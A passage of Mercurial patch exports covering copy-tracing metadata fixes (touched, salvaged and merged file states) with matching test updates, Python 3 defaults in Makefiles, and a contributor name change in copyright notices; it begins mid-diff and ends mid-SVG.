(no-compatibility no-changeset no-upgraded no-upgraded-parallel !) + a (upgraded missing-correct-output !) + a (upgraded-parallel missing-correct-output !) + A t + p + R a + R p + $ hg status --copies --rev 'desc("i-0")' --rev 'desc("mBC-change-m-0")' + M b + A d + a (no-compatibility no-changeset !) 
+ A t + p + R a + R p + $ hg status --copies --rev 'desc("c-1")' --rev 'desc("mCB-change-m-0")' + M b + A d + $ hg status --copies --rev 'desc("c-1")' --rev 'desc("mBC-change-m-0")' + M b + A d + $ hg status --copies --rev 'desc("b-1")' --rev 'desc("mCB-change-m-0")' + M d + $ hg status --copies --rev 'desc("b-1")' --rev 'desc("mBC-change-m-0")' + M d + + Decision from previous merge are properly chained with later merge ------------------------------------------------------------------ # HG changeset patch # User Pierre-Yves David <pierre-yves.david@octobus.net> # Date 1615811865 -3600 # Mon Mar 15 13:37:45 2021 +0100 # Node ID c52c3c4cbd3f269b673971073939b95948e95202 # Parent 316a768f2e43e1bb308b9f1265df5100ea43601e copies: detect files as `touched/salvaged` if they only existed on one side The file cannot be merged if there was content to merge on the other side. So the previous record was wrong. In the general case, the file existed only on one side and got touched during the merge. So it should detected as touched. They are a special case where the merge manually prevent the file to be deleted. In this case the file is marked as `salvaged`. The result of this `salvaged` recording, copy-tracing-wise, is the same as recording it as `merged`. This is probably why they were recorded as `merged` in the first place. Differential Revision: https://phab.mercurial-scm.org/D10219 diff --git a/mercurial/metadata.py b/mercurial/metadata.py --- a/mercurial/metadata.py +++ b/mercurial/metadata.py @@ -322,12 +322,12 @@ │ (Some, None) │ OR │🄻 Deleted │ ø │ ø │ │ │🄷 Deleted[1] │ │ │ │ ├──────────────┼──────────────┼──────────────┼──────────────┼──────────────┤ - │ │🄸 No Changes │ │ │ │ - │ (None, Some) │ OR │ ø │🄼 Added │🄽 Merged │ + │ │🄸 No Changes │ │ │ 🄽 Touched │ + │ (None, Some) │ OR │ ø │🄼 Added │OR 🅀 Salvaged │ │ │🄹 Salvaged[2]│ │ (copied?) │ (copied?) 
│ ├──────────────┼──────────────┼──────────────┼──────────────┼──────────────┤ - │ │ │ │ │ │ - │ (Some, Some) │🄺 No Changes │ ø │🄾 Merged │🄿 Merged │ + │ │ │ │ 🄾 Touched │ │ + │ (Some, Some) │🄺 No Changes │ ø │OR 🅁 Salvaged │🄿 Merged │ │ │ [3] │ │ (copied?) │ (copied?) │ └──────────────┴──────────────┴──────────────┴──────────────┴──────────────┘ @@ -454,8 +454,16 @@ # case 🄻 — both deleted the file. md.mark_removed(filename) elif d1[1][0] is not None and d2[1][0] is not None: - # case 🄽 🄾 🄿 - md.mark_merged(filename) + if d1[0][0] is None or d2[0][0] is None: + if any(_find(ma, filename) is not None for ma in mas): + # case 🅀 or 🅁 + md.mark_salvaged(filename) + else: + # case 🄽 🄾 : touched + md.mark_touched(filename) + else: + # case 🄿 : merged + md.mark_merged(filename) copy_candidates.append(filename) else: # Impossible case, the post-merge file status cannot be None on diff --git a/tests/test-copies-chain-merge.t b/tests/test-copies-chain-merge.t --- a/tests/test-copies-chain-merge.t +++ b/tests/test-copies-chain-merge.t @@ -1987,29 +1987,13 @@ ##### revision "mCB-change-m-0 merge explicitely revive deleted file - B side" ##### 1 sidedata entries entry-0014 size 14 - '\x00\x00\x00\x01\x10\x00\x00\x00\x01\x00\x00\x00\x00d' (no-upgraded no-upgraded-parallel !) - salvaged : d, ; (no-upgraded no-upgraded-parallel !) - '\x00\x00\x00\x01\x08\x00\x00\x00\x01\x00\x00\x00\x00d' (upgraded known-bad-output !) - merged : d, ; (upgraded known-bad-output !) - '\x00\x00\x00\x01\x10\x00\x00\x00\x01\x00\x00\x00\x00d' (upgraded missing-correct-output !) - salvaged : d, ; (upgraded missing-correct-output !) - '\x00\x00\x00\x01\x08\x00\x00\x00\x01\x00\x00\x00\x00d' (upgraded-parallel known-bad-output !) - merged : d, ; (upgraded-parallel known-bad-output !) - '\x00\x00\x00\x01\x10\x00\x00\x00\x01\x00\x00\x00\x00d' (upgraded-parallel missing-correct-output !) - salvaged : d, ; (upgraded-parallel missing-correct-output !) 
+ '\x00\x00\x00\x01\x10\x00\x00\x00\x01\x00\x00\x00\x00d' + salvaged : d, ; ##### revision "mBC-change-m-0 merge explicitely revive deleted file - B side" ##### 1 sidedata entries entry-0014 size 14 - '\x00\x00\x00\x01\x10\x00\x00\x00\x01\x00\x00\x00\x00d' (no-upgraded no-upgraded-parallel !) - salvaged : d, ; (no-upgraded no-upgraded-parallel !) - '\x00\x00\x00\x01\x08\x00\x00\x00\x01\x00\x00\x00\x00d' (upgraded known-bad-output !) - merged : d, ; (upgraded known-bad-output !) - '\x00\x00\x00\x01\x10\x00\x00\x00\x01\x00\x00\x00\x00d' (upgraded missing-correct-output !) - salvaged : d, ; (upgraded missing-correct-output !) - '\x00\x00\x00\x01\x08\x00\x00\x00\x01\x00\x00\x00\x00d' (upgraded-parallel known-bad-output !) - merged : d, ; (upgraded-parallel known-bad-output !) - '\x00\x00\x00\x01\x10\x00\x00\x00\x01\x00\x00\x00\x00d' (upgraded-parallel missing-correct-output !) - salvaged : d, ; (upgraded-parallel missing-correct-output !) + '\x00\x00\x00\x01\x10\x00\x00\x00\x01\x00\x00\x00\x00d' + salvaged : d, ; ##### revision "j-1" ##### 1 sidedata entries entry-0014 size 24 @@ -2031,21 +2015,13 @@ ##### revision "mEA,Jm" ##### 1 sidedata entries entry-0014 size 24 - '\x00\x00\x00\x01\x14\x00\x00\x00\x0b\x00\x00\x00\x00unrelated-j' (no-upgraded no-upgraded-parallel !) - touched : unrelated-j, ; (no-upgraded no-upgraded-parallel !) - '\x00\x00\x00\x01\x08\x00\x00\x00\x0b\x00\x00\x00\x00unrelated-j' (upgraded known-bad-output !) - merged : unrelated-j, ; (upgraded known-bad-output !) - '\x00\x00\x00\x01\x08\x00\x00\x00\x0b\x00\x00\x00\x00unrelated-j' (upgraded-parallel known-bad-output !) - merged : unrelated-j, ; (upgraded-parallel known-bad-output !) + '\x00\x00\x00\x01\x14\x00\x00\x00\x0b\x00\x00\x00\x00unrelated-j' + touched : unrelated-j, ; ##### revision "mJ,EAm" ##### 1 sidedata entries entry-0014 size 24 - '\x00\x00\x00\x01\x14\x00\x00\x00\x0b\x00\x00\x00\x00unrelated-j' (no-upgraded no-upgraded-parallel !) 
- touched : unrelated-j, ; (no-upgraded no-upgraded-parallel !) - '\x00\x00\x00\x01\x08\x00\x00\x00\x0b\x00\x00\x00\x00unrelated-j' (upgraded known-bad-output !) - merged : unrelated-j, ; (upgraded known-bad-output !) - '\x00\x00\x00\x01\x08\x00\x00\x00\x0b\x00\x00\x00\x00unrelated-j' (upgraded-parallel known-bad-output !) - merged : unrelated-j, ; (upgraded-parallel known-bad-output !) + '\x00\x00\x00\x01\x14\x00\x00\x00\x0b\x00\x00\x00\x00unrelated-j' + touched : unrelated-j, ; ##### revision "s-1" ##### 1 sidedata entries entry-0014 size 24 @@ -3560,9 +3536,7 @@ $ hg status --copies --rev 'desc("i-0")' --rev 'desc("mCB-change-m-0")' M b A d - a (no-compatibility no-changeset no-upgraded no-upgraded-parallel !) - a (upgraded missing-correct-output !) - a (upgraded-parallel missing-correct-output !) + a (no-compatibility no-changeset !) A t p R a # HG changeset patch # User Pierre-Yves David <pierre-yves.david@octobus.net> # Date 1615601820 -3600 # Sat Mar 13 03:17:00 2021 +0100 # Node ID 433cef8f3104bed1560e4403b8870cf8c4bf688d # Parent c52c3c4cbd3f269b673971073939b95948e95202 copies: distinguish between merged and touched files during upgrade This a filenode being different between p1, p2 and result does not necessarily means a merges happens. For example p2 could be a strict newer version of p1, so the p2 version is picked by the manifest merging, but then the file is manually updated before the commit. In this case the file should be detected as touched. Differential Revision: https://phab.mercurial-scm.org/D10220 diff --git a/mercurial/metadata.py b/mercurial/metadata.py --- a/mercurial/metadata.py +++ b/mercurial/metadata.py @@ -326,8 +326,8 @@ │ (None, Some) │ OR │ ø │🄼 Added │OR 🅀 Salvaged │ │ │🄹 Salvaged[2]│ │ (copied?) │ (copied?) 
│ ├──────────────┼──────────────┼──────────────┼──────────────┼──────────────┤ - │ │ │ │ 🄾 Touched │ │ - │ (Some, Some) │🄺 No Changes │ ø │OR 🅁 Salvaged │🄿 Merged │ + │ │ │ │ 🄾 Touched │ 🄿 Merged │ + │ (Some, Some) │🄺 No Changes │ ø │OR 🅁 Salvaged │OR 🅂 Touched │ │ │ [3] │ │ (copied?) │ (copied?) │ └──────────────┴──────────────┴──────────────┴──────────────┴──────────────┘ @@ -415,6 +415,7 @@ nice bonus. However do not any of this yet. """ + repo = ctx.repo() md = ChangingFiles() m = ctx.manifest() @@ -462,8 +463,15 @@ # case 🄽 🄾 : touched md.mark_touched(filename) else: - # case 🄿 : merged - md.mark_merged(filename) + fctx = repo.filectx(filename, fileid=d1[1][0]) + if fctx.p2().rev() == nullrev: + # case 🅂 + # lets assume we can trust the file history. If the + # filenode is not a merge, the file was not merged. + md.mark_touched(filename) + else: + # case 🄿 + md.mark_merged(filename) copy_candidates.append(filename) else: # Impossible case, the post-merge file status cannot be None on diff --git a/tests/test-copies-chain-merge.t b/tests/test-copies-chain-merge.t --- a/tests/test-copies-chain-merge.t +++ b/tests/test-copies-chain-merge.t @@ -1965,25 +1965,13 @@ ##### revision "mBF-change-m-0 merge with extra change - B side" ##### 1 sidedata entries entry-0014 size 14 - '\x00\x00\x00\x01\x14\x00\x00\x00\x01\x00\x00\x00\x00d' (no-upgraded no-upgraded-parallel !) - touched : d, ; (no-upgraded no-upgraded-parallel !) - '\x00\x00\x00\x01\x14\x00\x00\x00\x01\x00\x00\x00\x00d' (upgraded missing-correct-output !) - touched : d, ; (upgraded missing-correct-output !) - '\x00\x00\x00\x01\x08\x00\x00\x00\x01\x00\x00\x00\x00d' (upgraded known-bad-output !) - merged : d, ; (upgraded known-bad-output !) - '\x00\x00\x00\x01\x14\x00\x00\x00\x01\x00\x00\x00\x00d' (upgraded-parallel missing-correct-output !) - touched : d, ; (upgraded-parallel missing-correct-output !) - '\x00\x00\x00\x01\x08\x00\x00\x00\x01\x00\x00\x00\x00d' (upgraded-parallel known-bad-output !) 
- merged : d, ; (upgraded-parallel known-bad-output !) + '\x00\x00\x00\x01\x14\x00\x00\x00\x01\x00\x00\x00\x00d' + touched : d, ; ##### revision "mFB-change-m-0 merge with extra change - B side" ##### 1 sidedata entries entry-0014 size 14 - '\x00\x00\x00\x01\x14\x00\x00\x00\x01\x00\x00\x00\x00d' (no-upgraded no-upgraded-parallel !) - touched : d, ; (no-upgraded no-upgraded-parallel !) - '\x00\x00\x00\x01\x08\x00\x00\x00\x01\x00\x00\x00\x00d' (upgraded-parallel known-bad-output !) - merged : d, ; (upgraded-parallel known-bad-output !) - '\x00\x00\x00\x01\x08\x00\x00\x00\x01\x00\x00\x00\x00d' (upgraded known-bad-output !) - merged : d, ; (upgraded known-bad-output !) + '\x00\x00\x00\x01\x14\x00\x00\x00\x01\x00\x00\x00\x00d' + touched : d, ; ##### revision "mCB-change-m-0 merge explicitely revive deleted file - B side" ##### 1 sidedata entries entry-0014 size 14 @@ -3418,10 +3406,8 @@ A d h (filelog !) h (sidedata !) - a (upgraded known-bad-output !) - h (upgraded missing-correct-output !) - a (upgraded-parallel known-bad-output !) - h (upgraded-parallel missing-correct-output !) + h (upgraded !) + h (upgraded-parallel !) h (changeset !) h (compatibility !) A t # HG changeset patch # User Martin von Zweigbergk <martinvonz@google.com> # Date 1616444051 25200 # Mon Mar 22 13:14:11 2021 -0700 # Node ID ea8bfd33c22a7b2c62c9b26493d7f46bb97b98d4 # Parent 433cef8f3104bed1560e4403b8870cf8c4bf688d tests: replace some `python` by `"$PYTHON"` to not only use Python 2 I deleted my `python` binary as a test and a few tests started failing. 
Differential Revision: https://phab.mercurial-scm.org/D10250 diff --git a/tests/test-convert-cvs.t b/tests/test-convert-cvs.t --- a/tests/test-convert-cvs.t +++ b/tests/test-convert-cvs.t @@ -521,7 +521,7 @@ |cp932 |\x82\xa0 | x x o | $ mkdir -p cvsrepo/transcoding - $ python <<EOF + $ "$PYTHON" <<EOF > fp = open('cvsrepo/transcoding/file,v', 'wb') > fp.write((b''' > head 1.4; diff --git a/tests/test-merge-tools.t b/tests/test-merge-tools.t --- a/tests/test-merge-tools.t +++ b/tests/test-merge-tools.t @@ -1921,7 +1921,7 @@ Binary files capability checking $ hg update -q -C 0 - $ python <<EOF + $ "$PYTHON" <<EOF > with open('b', 'wb') as fp: > fp.write(b'\x00\x01\x02\x03') > EOF @@ -1929,7 +1929,7 @@ $ hg commit -qm "add binary file (#1)" $ hg update -q -C 0 - $ python <<EOF + $ "$PYTHON" <<EOF > with open('b', 'wb') as fp: > fp.write(b'\x03\x02\x01\x00') > EOF # HG changeset patch # User Martin von Zweigbergk <martinvonz@google.com> # Date 1616444472 25200 # Mon Mar 22 13:21:12 2021 -0700 # Node ID dc101c236219512ecd0427b96d9d8121bd6290f6 # Parent ea8bfd33c22a7b2c62c9b26493d7f46bb97b98d4 makefile: use Python 3 by default when building docs as well I copied the snippet defining `PYTHON` from the root Makefile. Differential Revision: https://phab.mercurial-scm.org/D10251 diff --git a/doc/Makefile b/doc/Makefile --- a/doc/Makefile +++ b/doc/Makefile @@ -6,7 +6,14 @@ PREFIX=/usr/local MANDIR=$(PREFIX)/share/man INSTALL=install -m 644 -PYTHON?=python +# Default to Python 3. +# +# Windows ships Python 3 as `python.exe`, which may not be on PATH. py.exe is. 
+ifeq ($(OS),Windows_NT) +PYTHON?=py -3 +else +PYTHON?=python3 +endif RSTARGS= export HGENCODING=UTF-8 # HG changeset patch # User Martin von Zweigbergk <martinvonz@google.com> # Date 1616452145 25200 # Mon Mar 22 15:29:05 2021 -0700 # Node ID 1977495dbbe272bc0969091e163b4620dcecc260 # Parent dc101c236219512ecd0427b96d9d8121bd6290f6 fuzz: use Python 3 in makefile As in the previous patch, I copied the snippet defining `PYTHON` from the root Makefile. Differential Revision: https://phab.mercurial-scm.org/D10252 diff --git a/contrib/fuzz/Makefile b/contrib/fuzz/Makefile --- a/contrib/fuzz/Makefile +++ b/contrib/fuzz/Makefile @@ -10,6 +10,15 @@ # OSS-Fuzz will define its own value for LIB_FUZZING_ENGINE. LIB_FUZZING_ENGINE ?= standalone_fuzz_target_runner.o +# Default to Python 3. +# +# Windows ships Python 3 as `python.exe`, which may not be on PATH. py.exe is. +ifeq ($(OS),Windows_NT) +PYTHON?=py -3 +else +PYTHON?=python3 +endif + PYTHON_CONFIG ?= $$OUT/sanpy/bin/python-config PYTHON_CONFIG_FLAGS ?= --ldflags --embed @@ -20,7 +29,7 @@ standalone_fuzz_target_runner.o: standalone_fuzz_target_runner.cc $$OUT/%_fuzzer_seed_corpus.zip: %_corpus.py - python $< $@ + $(PYTHON) $< $@ pyutil.o: pyutil.cc pyutil.h $(CXX) $(CXXFLAGS) -g -O1 \ # HG changeset patch # User Raphaël Gomès <rgomes@octobus.net> # Date 1616691728 -3600 # Thu Mar 25 18:02:08 2021 +0100 # Node ID d4ba4d51f85fc65935b79aff03c7f3d1bd14a642 # Parent 1977495dbbe272bc0969091e163b4620dcecc260 contributor: change mentions of mpm to olivia Matt Mackall is now Olivia Mackall. I reached out to her about changing the copyright notices to reflect this change and she gave me the green light, so I changed everything relevant. 
Differential Revision: https://phab.mercurial-scm.org/D10266 diff --git a/Makefile b/Makefile --- a/Makefile +++ b/Makefile @@ -187,7 +187,7 @@ $(PYFILESCMD) | xargs \ xgettext --package-name "Mercurial" \ --msgid-bugs-address "<mercurial-devel@mercurial-scm.org>" \ - --copyright-holder "Matt Mackall <mpm@selenic.com> and others" \ + --copyright-holder "Olivia Mackall <olivia@selenic.com> and others" \ --from-code ISO-8859-1 --join --sort-by-file --add-comments=i18n: \ -d hg -p i18n -o hg.pot.tmp $(PYTHON) i18n/posplit i18n/hg.pot.tmp diff --git a/contrib/all-revsets.txt b/contrib/all-revsets.txt --- a/contrib/all-revsets.txt +++ b/contrib/all-revsets.txt @@ -46,8 +46,8 @@ # Used in revision c1546d7400ef min(0::) # Used in revision 546fa6576815 -author(lmoscovicz) or author(mpm) -author(mpm) or author(lmoscovicz) +author(lmoscovicz) or author(olivia) +author(olivia) or author(lmoscovicz) # Used in revision 9bfe68357c01 public() and id("d82e2223f132") # Used in revision ba89f7b542c9 @@ -100,7 +100,7 @@ draft() and ::tip ::tip and draft() author(lmoscovicz) -author(mpm) +author(olivia) ::p1(p1(tip)):: public() :10000 and public() @@ -130,7 +130,7 @@ head() head() - public() draft() and head() -head() and author("mpm") +head() and author("olivia") # testing the mutable phases set draft() diff --git a/contrib/base-revsets.txt b/contrib/base-revsets.txt --- a/contrib/base-revsets.txt +++ b/contrib/base-revsets.txt @@ -25,9 +25,9 @@ 0::tip roots(0::tip) author(lmoscovicz) -author(mpm) -author(lmoscovicz) or author(mpm) -author(mpm) or author(lmoscovicz) +author(olivia) +author(lmoscovicz) or author(olivia) +author(olivia) or author(lmoscovicz) tip:0 0:: # those two `roots(...)` inputs are close to what phase movement use. 
diff --git a/contrib/check-code.py b/contrib/check-code.py --- a/contrib/check-code.py +++ b/contrib/check-code.py @@ -2,7 +2,7 @@ # # check-code - a style and portability checker for Mercurial # -# Copyright 2010 Matt Mackall <mpm@selenic.com> +# Copyright 2010 Olivia Mackall <olivia@selenic.com> # # This software may be used and distributed according to the terms of the # GNU General Public License version 2 or any later version. diff --git a/contrib/check-commit b/contrib/check-commit --- a/contrib/check-commit +++ b/contrib/check-commit @@ -1,6 +1,6 @@ #!/usr/bin/env python3 # -# Copyright 2014 Matt Mackall <mpm@selenic.com> +# Copyright 2014 Olivia Mackall <olivia@selenic.com> # # A tool/hook to run basic sanity checks on commits/patches for # submission to Mercurial. Install by adding the following to your diff --git a/contrib/check-config.py b/contrib/check-config.py --- a/contrib/check-config.py +++ b/contrib/check-config.py @@ -2,7 +2,7 @@ # # check-config - a config flag documentation checker for Mercurial # -# Copyright 2015 Matt Mackall <mpm@selenic.com> +# Copyright 2015 Olivia Mackall <olivia@selenic.com> # # This software may be used and distributed according to the terms of the # GNU General Public License version 2 or any later version. 
diff --git a/contrib/hg-test-mode.el b/contrib/hg-test-mode.el --- a/contrib/hg-test-mode.el +++ b/contrib/hg-test-mode.el @@ -1,6 +1,6 @@ ;; hg-test-mode.el - Major mode for editing Mercurial tests ;; -;; Copyright 2014 Matt Mackall <mpm@selenic.com> +;; Copyright 2014 Olivia Mackall <olivia@selenic.com> ;; "I have no idea what I'm doing" ;; ;; This software may be used and distributed according to the terms of the diff --git a/contrib/hgperf b/contrib/hgperf --- a/contrib/hgperf +++ b/contrib/hgperf @@ -2,7 +2,7 @@ # # hgperf - measure performance of Mercurial commands # -# Copyright 2014 Matt Mackall <mpm@selenic.com> +# Copyright 2014 Olivia Mackall <olivia@selenic.com> # # This software may be used and distributed according to the terms of the # GNU General Public License version 2 or any later version. diff --git a/contrib/logo-droplets.svg b/contrib/logo-droplets.svg --- a/contrib/logo-droplets.svg +++ b/contrib/logo-droplets.svg @@ -1,5 +1,5 @@ <?xml version="1.0" encoding="UTF-8" standalone="no"?> <!-- Created with Inkscape (http://www.inkscape.org/) --> -<svg id="Layer_1" xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#" xmlns="http://www.w3.org/2000/svg" xml:space="preserve" height="120" width="100" version="1.0" xmlns:cc="http://web.resource.org/cc/" xmlns:dc="http://purl.org/dc/elements/1.1/" viewBox="0 0 124.766 152.099"><metadata id="metadata6845"><rdf:RDF><cc:Work rdf:about=""><dc:format>image/svg+xml</dc:format><dc:type rdf:resource="http://purl.org/dc/dcmitype/StillImage"/><dc:title>Mercurial "droplets" logo</dc:title><dc:creator><cc:Agent><dc:title>Cali Mastny and Matt Mackall</dc:title></cc:Agent></dc:creator><cc:license rdf:resource="http://creativecommons.org/licenses/GPL/2.0/"/><dc:date>Feb 12 2008</dc:date></cc:Work><cc:License rdf:about="http://creativecommons.org/licenses/GPL/2.0/"><cc:permits rdf:resource="http://web.resource.org/cc/Reproduction"/><cc:permits rdf:resource="http://web.resource.org/cc/Distribution"/><cc:requires 
rdf:resource="http://web.resource.org/cc/Notice"/><cc:permits rdf:resource="http://web.resource.org/cc/DerivativeWorks"/><cc:requires rdf:resource="http://web.resource.org/cc/ShareAlike"/><cc:requires rdf:resource="http://web.resource.org/cc/SourceCode"/></cc:License></rdf:RDF></metadata> +<svg id="Layer_1" xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#" xmlns="http://www.w3.org/2000/svg" xml:space="preserve" height="120" width="100" version="1.0" xmlns:cc="http://web.resource.org/cc/" xmlns:dc="http://purl.org/dc/elements/1.1/" viewBox="0 0 124.766 152.099"><metadata id="metadata6845"><rdf:RDF><cc:Work rdf:about=""><dc:format>image/svg+xml</dc:format><dc:type rdf:resource="http://purl.org/dc/dcmitype/StillImage"/><dc:title>Mercurial "droplets" logo</dc:title><dc:creator><cc:Agent><dc:title>Cali Mastny and Olivia Mackall</dc:title></cc:Agent></dc:creator><cc:license rdf:resource="http://creativecommons.org/licenses/GPL/2.0/"/><dc:date>Feb 12 2008</dc:date></cc:Work><cc:License rdf:about="http://creativecommons.org/licenses/GPL/2.0/"><cc:permits rdf:resource="http://web.resource.org/cc/Reproduction"/><cc:permits rdf:resource="http://web.resource.org/cc/Distribution"/><cc:requires rdf:resource="http://web.resource.org/cc/Notice"/><cc:permits rdf:resource="http://web.resource.org/cc/DerivativeWorks"/><cc:requires rdf:resource="http://web.resource.org/cc/ShareAlike"/><cc:requires rdf:resource="http://web.resource.org/cc/SourceCode"/></cc:License></rdf:RDF></metadata> <rect id="rect6847" stroke-linejoin="miter" style="stroke-dasharray:none;" height="150.12" width="124.77" stroke="#000" stroke-miterlimit="4" y="0.98776" x="0.3169" stroke-width="1.9755" fill="#FFF"/><path id="text2611" style="stroke-dasharray:none;" 
d="M9.848,124.61c1.777-0.79,3.665-1.18,5.479-1.18,1.74,0,2.851,0.43,3.48,1.32,1.332-0.89,3.146-1.32,4.553-1.32,4.221,0,4.369,1.71,4.369,6.73v11.11c0,0.49,0.074,0.49-2.036,0.49v-11.81c0-3.63-0.074-4.74-2.48-4.74-1.073,0-2.184,0.25-3.369,1.03v15.27c-0.037,0.15-0.111,0.18-0.369,0.22-0.038,0-0.074,0.03-0.112,0.03h-1.555v-11.81c0-3.49,0-4.77-2.517-4.77-1.074,0-2.147,0.21-3.406,0.82v15.27c0,0.49,0.074,0.49-2.0361,0.49v-17.15m27.831-1.18c-3.146,0-6.626,0.89-6.626,10.4,0,7.33,2.554,8.47,6.071,8.47,2.701,0,5.034-0.89,5.034-1.32,0-0.53-0.074-1.35-0.259-1.82-1.148,0.79-2.777,1.21-4.59,1.21-2.48,0-4.146-0.71-4.184-6.22,1.629,0,5.776-0.04,8.848-0.65,0.259-1.17,0.37-2.88,0.37-4.37,0-3.56-1.444-5.7-4.664-5.7m-0.185,1.78c2.221,0,2.813,1.46,2.85,4.31,0,0.75-0.037,1.64-0.148,2.49-2.073,0.5-5.591,0.5-7.072,0.5,0.261-6.48,2.481-7.3,4.37-7.3m8.07-0.21c1.739-1.14,3.332-1.57,4.961-1.57,1.814,0,2.666,0.5,2.666,1.11,0,0.35-0.112,0.96-0.297,1.31-0.519-0.28-1.11-0.53-2.074-0.53-1.184,0-2.295,0.32-3.183,1.1v14.85c0,0.49,0.037,0.49-2.073,0.49v-16.76m18.69-0.39c0-0.47-1.554-1.18-3.11-1.18-2.999,0-6.664,1.03-6.664,9.83,0,8.33,2.222,9.07,6.109,9.07,1.924,0,3.665-1.03,3.665-1.6,0-0.32-0.074-0.82-0.26-1.24-0.778,0.56-1.962,1.1-3.22,1.1-2.665,0-4.22-0.75-4.22-7.23,0-7.15,2.554-8.15,4.775-8.15,1.258,0,1.962,0.36,2.665,0.82,0.186-0.43,0.26-1.03,0.26-1.42m14.181,16.55c-1.63,0.82-3.776,1.14-5.627,1.14-4.739,0-5.442-1.99-5.442-6.73v-11.14c0-0.46-0.037-0.46,2.074-0.46v11.82c0,3.56,0.517,4.77,3.294,4.77,1.073,0,2.554-0.22,3.665-0.86v-15.27c0-0.46-0.074-0.46,2.036-0.46v17.19m4.221-16.16c1.739-1.14,3.332-1.57,4.96-1.57,1.814,0,2.666,0.5,2.666,1.11,0,0.35-0.111,0.96-0.296,1.31-0.519-0.28-1.111-0.53-2.074-0.53-1.184,0-2.295,0.32-3.183,1.1v14.85c0,0.49,0.037,0.49-2.073,0.49v-16.76m12.379-1.03c-1.629,0-2.11,0-2.11,0.96v16.83c2.073,0,2.11,0,2.11-0.49v-17.3m-2.184-6.27c0,1.18,0.37,1.6,1.11,1.64,0.851,0,1.259-0.61,1.259-1.67,0.037-1.11-0.26-1.61-1.111-1.61-0.814,0-1.221,0.61-1.258,1.64m5.696,7.3c0-0.39,0.074-0.61,0.
222-0.71,0.704-0.39,3.41-0.86,6.48-0.86,2.33,0,3.81,1.11,3.81,4.31v2.31c0,6.34-0.18,11.07-0.18,11.07-0.85,0.47-2.45,1.18-5.04,1.18-2.66,0.03-5.329-0.22-5.329-5.48,0-5.02,2.739-5.81,5.479-5.81,1.04,0,2.26,0.11,3.07,0.43v-3.31c0-2.31-1.18-2.81-2.59-2.81-1.89,0-4.514,0.35-5.662,0.89-0.222-0.39-0.26-1-0.26-1.21m8.512,7.9c-0.7-0.25-1.7-0.35-2.4-0.35-2.11,0-4.04,0.42-4.04,4.34,0,3.66,1.59,3.7,3.48,3.7,1.19,0,2.37-0.32,2.78-0.75,0,0,0.18-4.27,0.18-6.94m7.86,8.37c0,0.49,0.04,0.49-2.04,0.49v-25.2c0-0.96,0.41-0.96,2.04-0.96v25.67" stroke-miterlimit="4" stroke-width="2.02999997" fill="#010101"/><g id="g4503" transform="matrix(0.9351326,0,0,0.9351326,150.39508,-1.251766)"><path id="path2339" fill="#1b1a1b" d="M-45.75,92.692c20.04-33.321-4.232-87.363-48.614-81.873-40.096,4.958-40.746,47.165-5.405,57.191,30.583,8.685,6.318,28.084,7.027,41,0.712,12.92,26.587,17.6,46.992-16.318z"/><circle id="circle2341" transform="matrix(1.0917947,-0.2858168,0.2858168,1.0917947,-180.30817,13.494135)" cy="85.364" cx="33.728" r="15.414" fill="#1b1a1b"/><path id="path2343" fill="#1b1a1b" d="M-140.06,48.936c-6.26,0.606-10.84,6.164-10.24,12.422,0.61,6.262,6.17,10.847,12.43,10.241,6.26-0.614,10.84-6.171,10.23-12.43-0.61-6.253-6.16-10.839-12.42-10.233z"/><path id="path2561" fill="#bfbfbf" d="M-44.993,91.34c20.041-33.321-4.231-87.363-48.613-81.873-40.104,4.9568-40.744,47.166-5.406,57.193,30.583,8.684,6.318,28.083,7.027,41,0.713,12.92,26.587,17.6,46.992-16.32z"/><path id="path2563" fill="#000" d="M-86.842,112.76c-1.215-1.97,0.642-4.16,2.551-3.99,3.039,0.26,9.655-0.04,14.876-3,13.043-7.39,33.114-42.966,23.019-65.405-4.519-10.044-6.72-12.92-11.374-17.833-0.95-1.002-0.405-0.948,0.238-0.609,2.517,1.321,6.94,6.437,11.477,14.765,7.664,14.069,7.267,30.795,4.416,41.287-1.986,7.299-8.825,23.815-18.842,30.955-10.039,7.15-21.785,11.26-26.361,3.83z"/><path id="path2565" fill="#000" 
d="M-95.93,66.591c-6.83-2.028-15.64-4.853-20.74-11.517-3.75-4.914-5.66-10.277-6.15-13.318-0.17-1.085-0.32-1.991-0.01-2.24,0.15-0.117,2.81,5.896,6.79,10.936,3.97,5.04,9.53,7.988,14.16,9.059,4.117,0.952,12.646,3.044,15.532,5.503,2.967,2.527,3.215,7.987,2.216,8.603-1.006,0.62-3.048-4.429-11.798-7.026z"/><path id="path2567" fill="#FFF" d="M-81.841,113.72c-0.132,1.57,1.665,1.87,4.083,1.51,3.099-0.46,5.72-0.81,9.287-2.6,4.835-2.42,9.728-5.89,13.312-10.57,10.692-13.945,14.478-30.45,13.895-32.824-0.195,1.961-2.776,12.253-8.679,21.532-7.582,11.922-13.079,18.262-25.758,21.342-3.529,0.86-5.967-0.45-6.14,1.61z"/><path id="path2569" fill="#FFF" d="M-109.96,59.479c1.44,1.225,4.4,2.857,10.223,4.767,7.031,2.305,10.455,4.304,11.888,5.262,1.52,1.018,2.483,3.288,2.578,1.272,0.099-2.019-1.145-3.755-3.921-4.675-1.878-0.624-5.038-2.109-8.067-2.707-1.946-0.384-5.111-1.146-7.831-1.978-1.48-0.457-3-1.258-4.87-1.941z"/><circle id="circle2577" transform="matrix(1.0917947,-0.2858168,0.2858168,1.0917947,-180.30817,13.494135)" cy="84.375" cx="34.681" r="15.414" fill="#bfbfbf"/><path id="path2579" fill="#000" d="M-128.68,108.38c13.53,12.54,33.894-4.69,24.93-19.897-1.01-1.708-2.32-3.009-1.89-1.7,2.87,8.747,0.22,15.667-4.72,19.227-4.85,3.5-11.51,4.09-16.84,1.32-1.57-0.81-2.22,0.37-1.48,1.05z"/><path id="path2585" fill="#FFF" d="M-118.07,110.95c1.73-0.36,11.75-2.95,14.1-11.194,0.73-2.569,0.86-2.053,0.66-0.661-1.06,7.105-7.78,12.345-13.49,12.545-1.16,0.12-2.68-0.39-1.27-0.69z"/><path id="path2589" fill="#bfbfbf" d="M-139.3,47.584c-6.26,0.605-10.84,6.164-10.24,12.422,0.61,6.261,6.17,10.847,12.43,10.241,6.25-0.614,10.84-6.173,10.23-12.431-0.61-6.254-6.17-10.838-12.42-10.232z"/><path id="path2591" fill="#000" 